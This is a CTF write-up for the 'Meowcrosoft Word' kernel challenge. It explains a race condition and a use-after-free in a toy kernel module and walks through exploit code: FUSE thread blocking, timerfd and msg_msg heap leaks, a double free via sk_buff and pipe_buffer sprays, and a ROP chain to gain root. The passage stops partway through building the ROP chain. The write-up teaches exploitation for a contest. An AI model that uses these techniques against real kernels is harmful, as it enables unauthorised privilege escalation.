Kernels and Cats

TLDR

Meowcrosoft Word is a kernel pwn challenge where only one allocate, one write, and one free is supposed to be possible. However, by exploiting a race condition and blocking/unblocking threads with FUSE (userfaultfd is disabled), privilege escalation from user to root is possible. timerfd_ctx is used to leak the kernel base, msg_msg is used to leak the kernel heap, and pipe buf is used to control RIP and start off a ROP chain to call prepare_kernel_cred() and commit_creds() to get root.

The Story Behind Meowcrosoft Word
Module Functionality
The FUSE Filesystem
Exploitation Overview
Setup
Triggering the Race Condition and Blocking
Leaking Kernel Base
Leaking the Kernel Heap with msg_msg
Getting a Double Free
ROP Time!!!

The Story Behind Meowcrosoft Word

Meowcrosoft Word was inspired by HITCON 2022’s Fourchain Kernel (a really great writeup by Organizers can be found here: https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel ), as well as my time in STAR Labs, where I had to deal with FUSE. Having had to do multiple writes by synchronizing threads and blocking/unblocking them, I was like “why not give people one single write, and force them to do it as well >:3”. However, because kernel pwn was already very cursed, and I wanted people to do it, so I had to give it a cute name, and hence Meowcrosoft Word came into existence.

However, because I was busy with school and lab and OSED and stuff, and then I had to fly back home for the holidays, I only really started working on the challenge right before the CTF (sorry violenttestpen!). This led to a lot of stupid funny crap happening during the competition.

On the first day of the CTF, people were saying that they wanted more pwn, so I tried to coerce (read: convince nicely) people to do Meowcrosoft Word. And so, within 1 hours and 20 minutes of the CTF starting, the challenge was blooded.

Flag in root image

(Thank you GenericUser for being an Upright and Honest Citizen TM)

Basically, what happened was that in my mad rush to submit the challenge, I told infra to run the root.img containing the flag on the challenge server, AND distribute the SAME root.img to the participants. So all you needed to do to get the flag was to extract the image and cat the flag 💀💀💀

The challenge went down for a while, but the disaster continues. On the same day that I submitted the challenge to infra, I managed to blow up my Kali VM (where I was developing the challenge and exploit on) by using too much hard disk space, resulting in me having to revert the VM and lose a lot of my work. Fortunately most of the challenge files were on GitHub, but somehow extracting root.img into a filesystem and then recreating the image file caused some explosions, so I had to completely remake the root.img via debootstrap, installing FUSE, etc etc. This took some time, but I managed to change the flag, rebuild root.img (for the server) and dist.img (for the players), and submit them to infra. …And then infra exploded again.

A few tickets were opened to tell me that the kernel challenge remote did not work, and I got a ticket from IceCreamMan telling me that because I forgot to add –monitor /dev/null to my qemu run command, it was possible to access the QEMU console 💀💀💀. We had to take the challenge down again, but hopefully since no one had a working exploit on local yet it was not too disruptive. I realized that for every connection, the QEMU command that run points to the same image, which also would not work. Some modifications were then made to copy a new root image for each new connection and use that for the QEMU command, and I submitted the new Dockerfiles and such for infra to rebuild. However, I realized that I should use a cron job to clean up all the unused images every 5 minutes to prevent the container from exploding, so I had to make yet another change and infra had to build the same stupid container for the third time in the same day. So for a while, everything was fine and dandy, and someone blooded the challenge!

Then, at 2.30 am the next day, I got a ticket saying that the server hosting the kernel challenge has gone down :"( I tried to SSH into the server, but I think it exploded pretty hard, so I sent a message to infra to restart it and went to sleep. Thankfully all was good the next morning and for the rest of the CTF :D (Note to self: Do not write challenges in a rush :“3)

Module Functionality

The main functionality of the module was in ioctl_module. The module takes a structure as such via ioctl:

struct req { 
    uint64_t size;
    uint64_t addr;
};

And can perform the following actions: create, write, read, and free.

There are 3 global variables which are all initially set to 0: create_done, write_done, and free_done. When an action has been completed, the corresponding variable would be set to 1. This would mean that without doing anything weird, you would only get 1 create, 1 write, and 1 free. Just like a crappy trial version of Microsoft Word (where you can’t actually do anything)!

    lVar2 = _copy_from_user(&size,param_3,0x10);
    if ((lVar2 != 0) || (_printk(&DAT_001003a2), (char *)0x100 < size)) goto LAB_001001d2;

The module first checks that the received size specified in the req struct is less than 0x100; if the size is greater than 0x100, any action called will fail and immediately jump to return.

Create a document: 0xc010ca00

    if (param_2 == 0xc010ca00) { // Create a new document
        if (create_done == 0) {
            create_done = 1;
            doc = (char **)kmalloc_trace(_DAT_00101088,0xdc0,0x20); 
            *doc = meow_str;
            doc[2] = size;
            doc[1] = expiry;
            data_ptr = (char *)__kmalloc(size,0xdc0);
            doc[3] = data_ptr; // Pointer to allocated region
            _printk(&DAT_001003d7); // "Create done"
        }
        else {
            _printk(&DAT_00100430); // "Unable to create any new documents"
            _printk(&DAT_00100458); // "Please buy a Meowcrosoft Word license."
        }
        goto LAB_001001d2;
    }

When create is called, a new document (tbh, a fancy way of saying note lol) is only created if create_done is 0. The doc object, and its data region is then allocated with the GFP_KERNEL flag. struct doc can be seen below:

struct document { // document object
    char * meow_str; // "Meowcrosoft Office Products TM"
    char * expiry; // "Expires now!!"
    uint64_t size; // Cannot be larger than 0x100
    uint64_t data_ptr; // Pointer to user information
};

I had to include the first two pointers to two useless strings in struct document as when the struct is freed later on, an encrypted pointer is written to doc[1] (due to CONFIG_SLAB_FREELIST_HARDENED, which obfuscates freelist pointers). For the challenge to work, data_ptr needs to remain intact and cannot be overwritten by anything; if an encrypted pointer was written there it would destroy the value.

Write to a document: 0xc010ca01

    if (doc != (char **)0x0) {
        if (write_done == 0) {
            if (doc[2] < size) {
                _printk(&DAT_001003e6); // "Prevent BOF" 
            }
            else {
                if (size < (char *)0x7d1) {
                    _copy_from_user(local_7e8,local_7f0);
                }
                else {
                    __copy_overflow(2000,size);
                }
                memcpy(doc[3],local_7e8,(size_t)size);
                write_done = 1;
                _printk(&DAT_001003f5); // "Write done"
            }
        }
        else {
            _printk(&DAT_001004b8); // "Unable to edit any more documents."
            _printk(&DAT_00100458); // "Please buy a Meowcrosoft Word license."
        }
        goto LAB_001001d2;
    }

The write function first checks if write_done is equals to 0, and if it is not, the function immediately goes to return, hence allowing only one write normally. It then checks if the size is larger than the size in the document object, and if it is not, the user data is copied into the region pointed to by data_ptr in the document struct. Finally, once memcpy has been completed, write_done is set to 1. Notice that write_done is only set to 1 after copy_from_user is called; this becomes important later on.

Read from a document: 0xc010ca02

    if (param_2 == 0xc010ca02) {
        if ((doc != (char **)0x0) && (size <= doc[2])) {
            memcpy(local_7e8,doc[3],(size_t)size);
            if (data_ptr < (char *)0x7d1) {
                _copy_to_user(local_7f0,local_7e8,data_ptr);
            }
            else {
                __copy_overflow(2000,data_ptr);
            }
            _printk(&DAT_00100403); // "Read done"
            goto LAB_001001d2;
        }
    }

The read function first ensures that the doc object exists (to prevent null pointer dereference), and that the size to read is smaller than the size specified inside the document struct. The number of bytes specified by size is then copied to a buffer, and copy_to_user copies the data to userspace. Unlike create, write and free, an unlimited number of reads can be performed.

Delete a document: 0xc010ca03

    else {
        if (param_2 != 0xc010ca03) goto LAB_001001d2;
        if (free_done != 0) {
            _printk(&DAT_001004e0); // "Unable to delete any more documents."
            _printk(&DAT_00100458); // "Please buy a Meowcrosoft Word license."
            goto LAB_001001d2;
        }
        if (doc != (char **)0x0) {
            free_done = 1;
            kfree(doc[3]);
            _printk(&DAT_00100410); // "Free done"
            goto LAB_001001d2;
        }
    }

The free function checks that free_done is equals to 0, and that the doc object exists, before setting free_done to 1 and performing a free on the data_ptr of the doc object. However, data_ptr is not zeroed out, resulting in a use-after-free.

There is also a race condition vulnerability – as there are no locks involved, it is possible to write to a doc that has been freed and reallocated as a different object, allowing us to corrupt certain fields that would aid in exploitation.

Userfaultfd is commonly used to block on copy_from_user, allowing for reliable race condition exploitation. However, in this challenge, as CONFIG_USERFAULTFD is not set, it would not be possible to use userfaultfd as the syscall is not implemented. Thankfully, CONFIG_FUSE_FS has been set, and fuse has been installed in root.img, allowing for control of the race condition via the FUSE filesystem.

The FUSE Filesystem

FUSE (Filesystem in UserSpacE) is an interface that allows non-privileged users to create their own filesystems without modifying kernel code. It consists of the kernel module, fuse.ko, the userspace library, libfuse, and the mount utility, fusermount. By setting up a FUSE filesystem, you can define custom functions to perform operations such as reading and writing to files. In this case, the read operation becomes particularly important as being able to control FUSE file reads will give us the ability to block and release threads whenever we want.

To define file operations and set up a FUSE filesystem, the following code can be used:

static struct fuse_operations operations = {
    .getattr	= do_getattr,
    .readdir	= do_readdir,
    .read	= do_read,
};

void fuse_setup_fn(void) {
    struct fuse_args args = FUSE_ARGS_INIT(0, NULL);
    struct fuse_chan *chan;
    struct fuse *fuse;
    
    if (mkdir("/tmp/fuse_dir", 0777)) {
        perror("[!] mkdir FUSE failed");
        exit(-1);
    }
    
    if (!(chan = fuse_mount("/tmp/fuse_dir", &args))) {
        perror("[!] fuse_mount failed");
        exit(-1);
    }
                                                                                          
    if (!(fuse = fuse_new(chan, &args, &operations, sizeof(operations), NULL))) {
        fuse_unmount("/tmp/fuse_dir", chan);
        perror("[!] Setup failed");
        exit(-1);
    }
    
    fuse_set_signal_handlers(fuse_get_session(fuse));
    fuse_loop_mt(fuse);
}

And in main, to make the FUSE directory and to start the filesystem:

    // Make FUSE directory
    printf("[+] Making FUSE directory /tmp/fuse_dir\n");
    if (mkdir("/tmp/fuse_dir", 0777)) {
        perror("[!] mkdir FUSE failed");
        exit(-1);
    }
    
    // Start the FUSE filesystem
    printf("[+] Starting FUSE filesystem\n");
    if (!fork()) {
        dup2(1, 666);
        fuse_main(argc, argv, &operations, NULL);
    }
    sleep(1);

You can see that filesystem operations such as getattr, readdir and read can be set to user defined functions. For instance, if I set the read operation to do_read as follows:

static int do_read(const char *path, char *buffer, size_t size, off_t offset, struct fuse_file_info *fi) {
	dprintf(666, "--> Trying to read %s, %u, %u\n", path, offset, size);
	uint64_t write1[0x100];
    char *selectedText = NULL;
	char signal;
	
	if (strcmp(path, "/write1") == 0) {
	    memset(write1, 0, sizeof(write1));
	    write1[0] = 0x4242424242424242;
		selectedText = write1;
    	}
	else {
		return -1;
    	}
	memcpy(buffer, selectedText + offset, size);
	return strlen(selectedText) - offset;
}

If the fuse directory is mapped to /tmp/fuse_dir, and you try to read from /tmp/fuse_dir/write1, you will receive “BBBBBBBB”. Through defining a custom read operation, we are not only able to control what can be read from the FUSE file, but also what happens when the file is read (e.g. blocking).

Exploitation Overview

So we know that it is possible to trigger a race condition on the kernel module, and that there is a use-after-free in the delete function, where the pointer to the data object in struct document is not zeroed out.

So here is what we are going to do:

Meowcrosoft Word Exploit Flow

Create a new document of size 0x100. The data section will be allocated in kmalloc-256.
Create a new thread “write2_thread”.
Write to the document where the buffer containing the data to be written is set to the mmapped address of FUSE file /write2. This will cause the main thread to block, and execution will be passed to write2_thread.
Create a new thread “write1_thread”.
Write to the document where the buffer containing the data to be written is set to the mmapped address of FUSE file /write1. This will cause write2_thread to block, and execution will be passed to write1_thread.
Trigger the race condition by deleting the document (which will free the data section). At this point, there are pending writes to an object that has already been freed.
While the write is still blocked, spray timerfd_ctx and arm the timers in order to leak a kernel address that can be used to calculate the kernel base.
Free the timerfd_ctx objects.
Spray msg_msg to cross cache and occupy the freed object.
Unblock write1 to overwrite msg_msg size to a large value (0x960 in this case). At this point, write2 is still blocked.
Read from the corrupted msg_msg object to leak a kmalloc-1024 address, as well as a next/prev pointer.
Unblock write2 and overwrite next/prev so that the next/prev of 2 msg_msg objects of size 256 are pointing to the same secondary msg_msg of size 1024.
Free the secondary msg_msg (that has 2 next pointers pointing to it) once.
Spray sk_buf objects.
Free the secondary msg_msg again to obtain a double free.
Spray and free pipe_buf objects over the freed object of size 1024.
Construct a fake pipe_buf object over the freed region and spray. The fake object will have release in pipe_buf_operations pointing to the start of the ROP chain.
Release the pipe buffer objects by closing the pipes to trigger off the ROP chain.
ROP it like it’s hot to get your shell!

Setup

We are first going to do some setup before our exploit.

We want to limit all actions to the same CPU, so we will make a call to sched_setaffinity.

    cpu_set_t cpu;
    CPU_ZERO(&cpu);
    CPU_SET(0, &cpu);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &cpu)) {
        perror("sched_setaffinity");
        exit(-1);
    }

We are then going to set up some pipes that would be used for blocking in the FUSE filesystem, as well as to synchronize different parts of our exploits so that the actions take place in the exact order that we want them to.

    // Setting up FUSE pipes to sync exploit
    printf("[+] Setting up pipes\n");
    pipe(fuse_pipe1);
    pipe(fuse_1_2_sync);
    pipe(fuse_pipe2);
    pipe(fuse_write2_data);

Then, we are going to start the FUSE filesystem. Note that when the FUSE filesystem is started, all of the contents in the FUSE files and such would be finalized in a sense. For example, when you read from a FUSE file, the contents that you get would be the contents of the file when the FUSE filesystem is initialized. However, there is a way to “modify” the contents of a FUSE file by reading and writing to pipes; I will talk about this later on.

    // Start the FUSE filesystem
    printf("[+] Starting FUSE filesystem\n");
    if (!fork()) {
        dup2(1, 666);
        fuse_main(argc, argv, &operations, NULL);
    }
    sleep(1);

After starting the FUSE filesystem, we need to mmap the files “/write1” and “/write2” as we would need the addresses later on in the exploit.

    // Open and mmap write1 file on FUSE
    printf("[+] Opening FUSE file write1\n");
    int fuse_fd1; 
    if((fuse_fd1 = open("/tmp/fuse_dir/write1", O_RDWR)) < 0) {
        perror("[!] Failed to open FUSE file");
        exit(-1);
    }
    // mmap the /write1 file
    addr_write1 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE, fuse_fd1, 0);
    if (addr_write1 == MAP_FAILED) {
        perror("[!] mmap failed");
        exit(-1);
    }
    // Open and mmap write2 file on FUSE
    printf("[+] Opening FUSE file write2\n");
    int fuse_fd2; 
    if((fuse_fd2 = open("/tmp/fuse_dir/write2", O_RDWR)) < 0) {
        perror("[!] Failed to open FUSE file");
        exit(-1);
    }
    // mmap the /write2 file
    addr_write2 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE, fuse_fd2, 0);
    if (addr_write2 == MAP_FAILED) {
        perror("[!] mmap failed");
        exit(-1);
    }

We also need to set up sockets, pipe buffer structs, and msg_msg queues that would be used later on in the exploit.

    // Set up sockets
    printf("[+] Setting up sockets\n");
    for (int i = 0; i < NUM_SOCKETS; i++) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
            perror("[!] Socket pair");
            exit(-1);
        }
    }
    
    // Set up message queues
    printf("[+] Setting up msg queues\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
            perror("[!] msgget failed");
            exit(-1);
        }
    }
    
    // Set up pipebuf stuff
    struct pipe_buf_operations *ops;
    struct pipe_buffer *pbuf;

Finally, we need to open the Meowcrosoft Word device.

    // Open Meowcrosoft word device
    printf("[+] Opening Meowcrosoft Word device\n");
    if ((fd = open("/dev/meowcrosoft_word", O_RDONLY)) < 0) {
        perror("[!] Failed to open miscdevice");
        exit(-1);
    }

Triggering the Race Condition and Blocking

Now comes the fun part. We are going to trigger the race condition, and then block twice – first on /write2, which will call write2_thread, which will then block on /write1, which will then call write1_thread.

We first create the doc object by doing something like create_doc(buf, 256);. create_doc is just a helper function that I have created to handle all the IOCTL calls to make life easier. This will allocate and create a doc object. A data region of size 256 will also be allocated in kmalloc-256.

Once that is done, we will create a new thread for the function write2_thread. We will then call a write on the address returned from mmapping the /write2 file, and cause a block.

    // Create thread for write2
    printf("[+] Creating thread for write2\n");
    pthread_t thr;
    int b = pthread_create(&thr, NULL, write2_thread, NULL); 
    if(b != 0) {
        perror("pthread_create");
        exit(-1);
    }
    
    write_doc(addr_write2, 0x18); // Trigger and block 
    sleep(1);

Now the question is: why does the main thread block when we call write using addr_write2 (/write2)? When write_doc is called, at this point, write_done is 0, hence that check passes. A doc object exists, so that check also passes. The number of bytes that we are trying to write is smaller than the size of the data region (which is stored in the document object), so that check also passes. Since that check has passed, the module will now call copy_from_user to copy whatever is inside the specified address from userspace (in this case addr_write2, which /write2 has been mmapped to) to some buffer in kernel space. Let’s take a look at the FUSE file mappings to see what happens when a read on the /write2 is called.

static int do_read(const char *path, char *buffer, size_t size, off_t offset, struct fuse_file_info *fi) {
	dprintf(666, "--> Trying to read %s, %u, %u\n", path, offset, size);
	char lolText[0x200];
	uint64_t write1[0x100];
    char *selectedText = NULL;
	char signal;
	
	if (strcmp(path, "/write1") == 0) {
	    memset(write1, 0, sizeof(write1));
	    write1[0] = 0x4242424242424242;
	    write1[1] = 0x4242424242424242;
	    write1[2] = 0x4343434343434343; 
	    write1[3] = 0x960;
		selectedText = write1;
		dprintf(666, "[+] Blocking FUSE read thread\n");
		read(fuse_pipe1[0], &signal, 1);
		dprintf(666, "[+] Unblocked FUSE read thread\n");
    	}
	else if (strcmp(path, "/write2") == 0) {
        	dprintf(666, "[+] Blocking FUSE read thread\n");
        	memset(lolText, 0, sizeof(lolText));
        	read(fuse_pipe2[0], &signal, 1);
        	read(fuse_write2_data[0], &lolText, 0x18);
        	selectedText = lolText;
        	dprintf(666, "[*] From FUSE: %llx\n", ((uint64_t *) selectedText)[0]);
        	dprintf(666, "[*] From FUSE: %llx\n", ((uint64_t *) selectedText)[1]);
        	dprintf(666, "[*] From FUSE: %llx\n", ((uint64_t *) selectedText)[2]);
		dprintf(666, "[+] Unblocked FUSE read thread\n");
    	}
	else {
		return -1;
    	}
	memcpy(buffer, selectedText + offset, size);
	return 0x100 - offset;
}

When a read from the FUSE file /write2 occurs, read(fuse_pipe2[0], &signal, 1); is triggered. However, remember we have just created the pipes when we set up the exploit; there is nothing that can be read from the pipe. As there is currently nothing to read from the pipe, the main thread would block on read as it will try to read from the pipe until it successfully reads something. This will cause context switching to the newly created thread running the function write2_thread.

Inside write2_thread, we do the same block on write again, but this time, we block on read from /write1. We call write but use the address that has been mmapped to the FUSE file /write1.

    // Create thread for write1
    printf("[+] Creating thread for write1\n");
    pthread_t thr;
    int b = pthread_create(&thr, NULL, write1_thread, NULL); 
    if(b != 0) {
        perror("pthread_create");
        exit(-1);
    }
    
    write_doc(addr_write1, 0x20); // Trigger and block 
    sleep(1);

Similarly as before and as seen in the code for FUSE above, when we try to read from /write1, read(fuse_pipe1[0], &signal, 1); is called, causing write2_thread to block and the CPU would execute write1_thread instead.

Leaking Kernel Base

To leak the kernel base, we can spray the timerfd_ctx object. Struct timerfd_ctx and other relevant structs are shown below:

struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};

struct timerqueue_node {
	struct rb_node node;
	ktime_t expires;
};

struct rb_node {
	unsigned long  __rb_parent_color;
	struct rb_node *rb_right;
	struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

From all the structs, we can see that enum hrtimer_restart starts at index 0x28 in struct timerfd_ctx, and is a function pointer. If we arm the timers, hrtimer_restart will be populated with a kernel pointer, which we can leak and use to calculate kernel base.

To spray and arm the timers, we can do the following:

    // Spray timerfd objects
    printf("[+] Spraying timerfd\n");
    for (int i = 0; i < NUM_TIMERFDS; i++) {
        timerfds[i] = timerfd_create(CLOCK_REALTIME, 0); 
        timerValue.it_value.tv_sec = 1;
        timerValue.it_value.tv_nsec = 0;
        timerValue.it_interval.tv_sec = 1;
        timerValue.it_interval.tv_nsec = 0;
        timerfd_settime(timerfds[i],  0, &timerValue, NULL); 
    }   
    sleep(1);

We can then simply read the doc to leak a kernel pointer.

Leaking the Kernel Heap with msg_msg

We now want to get a kernel heap leak in a kmalloc-cg-1024 cache, as that is where the pipe_buffer objects that we will later use in exploitation would be allocated (or at least this is what I intended, will explain more later). In order to do that, we are going to make use of struct msg_msg, which you can see below:

struct msg_msg {
	struct list_head m_list; // contains 2 pointers, next and prev
	long m_type;             // message type
	size_t m_ts;		     // message data size
	struct msg_msgseg *next; // msg_msgseg contains more data from the same msg_msg if the size is very big
	void *security;          // selinux security pointer
	/* the actual message follows immediately */
};

struct msg_msg is an elastic object, and can have any size as long as it is above 0x30. The object can be allocated via the msgsnd() syscall, and freed via the msgrcv() syscall, and was originally intended for IPC communication via System V message queues. If the kernel was compiled with CONFIG_CHECKPOINT_RESTORE (which it was in this challenge), msgrcv() can also be used to leak data without freeing the msg_msg object.

The struct list_head m_list contain the next and previous pointers to messages in the same queue (and messages do not have to be the same size). As such, we can use the next pointer in struct list_head to leak a kmalloc-cg-1024 address.

This is when the cross cache attack comes in. Remember that the document data object was allocated with GFP_KERNEL, which means that it would end up in kmalloc-256 (a normal kmalloc cache), but the msg_msg object is allocated with GFP_KERNEL_ACCOUNT, which means that it would end up in a kmalloc-cg-x cache depending on its size. The general idea of the cross cache attack is to mess with the buddy allocator so that instead of being allocated into a cg cache, the msg_msg object will be allocated into the normal cache and reclaim the freed space after the timerfd_ctx object occupying the freed document data region is freed. You can check out https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/#crossing-the-cache-boundary for more information about the cross cache attack, but I found that spraying a large number of objects in the normal kmalloc cache, freeing all of them, and spraying a large number of objects you want to occupy the victim object with works prefrectly well.

We will first free all the timerfd_ctx objects in preparation for the msg_msg spray.

    // Free timerfd objects
    printf("[+] Freeing timerfd spray\n");
    for (int i = 0; i < NUM_TIMERFDS; i++) {
        close(timerfds[i]);
    }

We will then spray primary msg_msg objects of size 256 (which is the same size as the document data object), in the hopes that one of them will reclaim the freed space where the document data object was. In each of the message queues, we will then spray a secondary message of size 1024, so that the next pointer of the msg_msg objects will point to a kmalloc-cg-1024 address.

    // Spray msg_msg to cross cache
    dprintf(667, "[+] Spraying primary msg_msg objects\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        memset(&message, 0, sizeof(message));
        *(long *)&message.mtype = 0x41;
        *(int *)&message.mtext[0] = MSG_TAG;
        *(int *)&message.mtext[4] = i;
        if (msgsnd(msqid[i], &message, sizeof(message) - sizeof(long), 0) < 0) {
            perror("[!] msg_msg spray failed");
            exit(-1);
        }
    }
    sleep(1);
    
    dprintf(667, "[+] Spraying secondary msg_msg objects\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        memset(&msg_secondary, 0, sizeof(msg_secondary));
        *(long *)&msg_secondary.mtype = 0x42;
        *(int *)&msg_secondary.mtext[0] = MSG_TAG;
        *(int *)&msg_secondary.mtext[4] = i;
        if (msgsnd(msqid[i], &msg_secondary, sizeof(msg_secondary) - sizeof(long), 0) < 0) {
            perror("[!] msg_msg spray failed");
            exit(-1);
        }
    }
    sleep(1);

This is the moment when we unblock /write1 by writing to the pipe via write(fuse_pipe1[1], "A", 1);. After writing to the pipe, the read can read something from it too, hence the first write to unblock. If we look at the contents of the first write:

	    write1[0] = 0x4242424242424242;
	    write1[1] = 0x4242424242424242;
	    write1[2] = 0x4343434343434343; 
	    write1[3] = 0x960;

At index 0x18, corresponding to m_ts, we have overwritten the original size of the msg_msg object (which was 0x100) to 0x960. Now, we can start leaking data via msg_msg. We first want to find out which of the msg_msg objects were corrupted, and I did that by reading from each of the msg_msg object using the MSG_COPY option, which allows me to read from the objects without freeing them. The m_type of the primary msg_msg objects in the spray were all set to 0x41; if there is an object where m_type is not 0x41, that is our target corrupted object.

    printf("[+] Finding corrupted message\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        if (msgrcv(msqid[i], &message_leak, sizeof(message_leak) - sizeof(long), 0, MSG_COPY | IPC_NOWAIT) < 0) {
            perror("[!] msgrcv failed");
            exit(-1);
        }
        if (*(int *)&message_leak.mtype != 0x41) {
            corrupted_idx = i;
            break;
        }
    }

I was then able to leak a huge number of bytes (greater than the original 0x100) from the corrupted msg_msg object, which thinks that its size is 0x960. From there, I leaked the next pointer of the next message (which points to a kmalloc-cg-1024 heap address, which will be our target for spraying pipe buffer objects), as well as another set of next and prev pointers which will be used later in the exploit. Here is the current state of the system (prev pointers not shown for simplicity):

Diagram1

So remember when I said that the cross cache was the intended solution? Later on in the CTF, someone remarked that they did not have to spray a lot of msg_msg objects to reclaim the freed document data region. So, I went to check the challenge again, and the kmalloc-cg caches seem to be missing from /proc/slabinfo or /sys/kernel/slab 0.0 I am currently not sure why this is the case, though I suspect it may have something to do with cache aliasing, but I may update this blog post or write another one when I find out why. If anyone knows why, please let me know!

UPDATE

So I found out why this was happening! Being a noob, I forgot to set CONFIG_MEMCG=y, which basically caused the cg caches to not exist. Whoops (skill issue moment). For more about CONFIG_MEMCG, check this out: https://cateee.net/lkddb/web-lkddb/MEMCG.html

Getting a Double Free

So here is how we are going to get a double free. We are going to first overwrite the next and prev pointer of the corrupted primary msg_msg object with the leaked next and free pointer by unblocking /write2. We are then going to free the secondary message belonging the primary msg_msg whose next and free pointer we leaked. Note that when freeing the secondary messages, they are located via the next pointer. If we wanted to instantly get the double free, we could free the secondary message which the next pointer of the corrupted primary msg_msg object is pointing to (which would be the already freed secondary message), but to not cause crashes, we will spray a fake secondary msg_msg of size 1024 over the freed area, and then free the second time (which is why we needed another set of next/prev pointers because they would be the next/prev pointers of the fake secondary message). After freeing for the second time, we will spray pipe_buf over the freed region of size 1024, and get to controlling RIP!

Let’s first talk about overwriting the next/prev pointer of the corrupted primary msg_msg object. We would do this with the next/prev pointers that we have leaked, but remember that previously, I mentioned that the contents of a FUSE file are “fixed” once the filesystem has been started in the setup phase. But fret not, there is a very cursed way of getting around this.

Remember how we used pipes to block and unblock FUSE? Turns out, we can also use the pipes to send and receive data (which are what pipes are for). We will try to read from a pipe when a read from the FUSE file /write2 is performed (via read(fuse_write2_data[0], &lolText, 0x18);), which will block. Then, after our leak and such is done, what we will do is that we will write the data which we want to overwrite next/prev in the corrupted msg_msg with into the pipe.

    // Build fuse_write2_data 
    memset(buf, 0, sizeof(buf)); 
    ((unsigned long *)buf)[0] = heap_addr;
    ((unsigned long *)buf)[1] = heap_prev;
    ((unsigned long *)buf)[2] = 0x41;
    write(fuse_write2_data[1], &buf, 0x18);

That way, when the read from the pipe completes, and FUSE unblocks, it can use that data as the contents of the FUSE file, which will then be used to perform the write.

At this point, this is the state of the system:

Diagram2

We are then going to free the secondary message belonging to the next primary msg_msg.

    // Free the next_idx secondary msg_msg first
    printf("[+] Freeing the next_idx secondary msg_msg\n");
    if (msgrcv(msqid[next_idx], &msg_secondary, sizeof(msg_secondary)-sizeof(long), 0x42, 0) < 0) {
        perror("[!] Free fake msg_msg object failed");
        exit(-1);
    }
    sleep(1);

The system now looks like this:

Diagram3

Then, we are going to spray a fake secondary msg_msg object via sk_buff. Note that I have set the security pointer to 0; I had to explicitly disable SELinux in the kernel config for this to work, or not there would be a NULL pointer dereference, and everything would explode. Theoretically we could leak a security pointer when we leak all the other stuff and use that as the security pointer, but I was lazy (whoops).

    printf("[+] Spraying sk_buff objects\n");
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_msg_msg((void *)secondary_buf, kheap_pt1, kheap_pt2, 1024 - MSG_MSG_SIZE, 0);
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (write(ss[i][0], secondary_buf, sizeof(secondary_buf)) < 0) {
                perror("[!] write");
                exit(-1);
            }
        }
    }

The system after the spray:

Diagram4

After that, we are going to free the fake secondary msg_msg by freeing the secondary message of the corrupted msg_msg object.

    // Free the secondary message of corrupted_idx
    printf("[+] Freeing the corrupted_idx secondary msg_msg\n");
    if (msgrcv(msqid[corrupted_idx], &msg_secondary, sizeof(msg_secondary)-sizeof(long), 0x42, 0) < 0) {
        perror("[!] Free fake msg_msg object failed");
        exit(-1);
    }
    sleep(1);

The system now, with sk_buff pointing to the freed region:

Diagram5

At this point, we can setup the pipe_buf spray via sk_buff:

    printf("[+] Spraying pipe_buf over freed 1024 area\n");
    for (int i = 0; i < NUM_PIPEFDS; i++) {
        if (pipe(pipefd[i]) < 0) {
            perror("[!] pipe");
            exit(-1);
        }
        if (write(pipefd[i][1], "ABC", 3) < 0) {
            perror("[!] write");
            exit(-1);
        }
    } 
    
    // Free pipe_buffer objects
    printf("[+] Freeing pipe_buffer objects\n");
    for (int i = 0; i < NUM_SOCKETS; i++) {
        for (int j = 0; j < NUM_SKBUFFS; j++) {
            if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
                perror("[!] read");
                exit(-1);
            }
        }
    }

Note that pipe buffer is allocated in kmalloc-cg-1024.

ROP Time!!!

It is finally time to control RIP! We are going to make a fake pipe_buffer object with a fake pipe_buf_operations, where ops->release points to our first ROP gadget. Then, we are going to spray this fake pipe buffer object via sk_buff. To control RIP, all we need to do is to release the pipe buffer objects by closing the pipes.

Another way to control RIP would be to spray seq_operations instead (the initial document data object size would need to be 32 in that case) and overwrite one of the function pointers, which someone did in the CTF.

    memset(secondary_buf, 0, sizeof(secondary_buf));
    pbuf = (struct pipe_buffer *)&secondary_buf;
    pbuf->ops = heap_addr + 0x290;
    ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
    ops->release = kernel_base + 0x60ecea; // 0xffffffff8160ecea : push rsi ; jmp qword ptr [rsi + 0x39]
    
    uint64_t *rop;
    rop = (uint64_t *)&secondary_buf[0x39];
    *rop = kernel_base + 0x02ba00; // 0xffffffff8102ba00 : pop rsp ; ret
    
    rop = (uint64_t *)&secondary_buf[0x0];
    *rop = 0xdeadbeefcafebabe;
    *rop++ = kernel_base + 0x4cf160; // ret 0x100;
    *rop++ = kernel_base + 0x426; // ret
    
    rop = (uint64_t *)&secondary_buf[0x178];
    *rop = kernel_base + 0x6615f; // pop rdi ; pop 5 ; ret
    *rop++ = kernel_base + 0x6615f; // pop rdi ; pop 5 ; ret
    
    rop = (uint64_t *)&secondary_buf[0x110];
    *rop = 0x4141414142424242;
    *rop++ = kernel_base + 0x6615f; // pop rdi ; pop 5 ; ret
    *rop++ = kernel_base + 0x1a0c900; // init_task
    *rop++ = 0x4141414141414141;
    *rop++ = 0x4141414141414141;
